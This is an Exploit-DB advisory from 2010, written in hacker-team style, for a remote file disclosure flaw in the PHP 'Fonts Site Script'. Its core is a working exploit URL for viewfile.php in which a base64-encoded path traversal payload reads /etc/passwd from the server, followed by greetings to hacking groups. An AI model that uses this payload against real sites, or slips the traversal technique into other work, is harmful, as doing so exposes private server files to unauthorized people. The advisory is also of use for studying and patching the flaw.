Fonts Site Script - Remote File Disclosure

EDB-ID:

11376

CVE:

N/A

Author:

JIKO

Type:

webapps

Platform:

PHP

Published:

2010-02-09

=---------------------------------------------=
=                ,.:oO0^-^0Oo:.,              =
=                      JIKO                   =
=                '':0Oov-voO0:''              =
=---------------------------------------------=
----------------------=JIKO=-------------------
| Autor    :> jiko
| Home     :> WwW.No-Exploit.CoM
| 
| Bug      :> Remote File Disclosure Vulnerability
| Vendor        :> http://www.arwscripts.com
_______________________________________________
=                   JIKI TEAm                 =
_______________________________________________
| Exploit:
.:|http://localhost/[Script]/classes/viewfile.php?f=[file base64 encode ]
~EX
http://server/fontssite/viewfile.php?f=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
base64 encode =>../../../../../../../etc/passwd
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
| Greetz :
.:|     Cyber-Zone,HxH,Hussin X,sniper code,Stack,HiSoKa, kasper ,skull-hacker The SadHacker
    |No-Exploit.com Members Stack & Gold_M & HaCkeR_EgY  All Member wwW.No-Exploit.CoM
----------------------=JIKO=-------------------
=---------------------------------------------=
=                   JIKI TEAm                 =
=---------------------------------------------=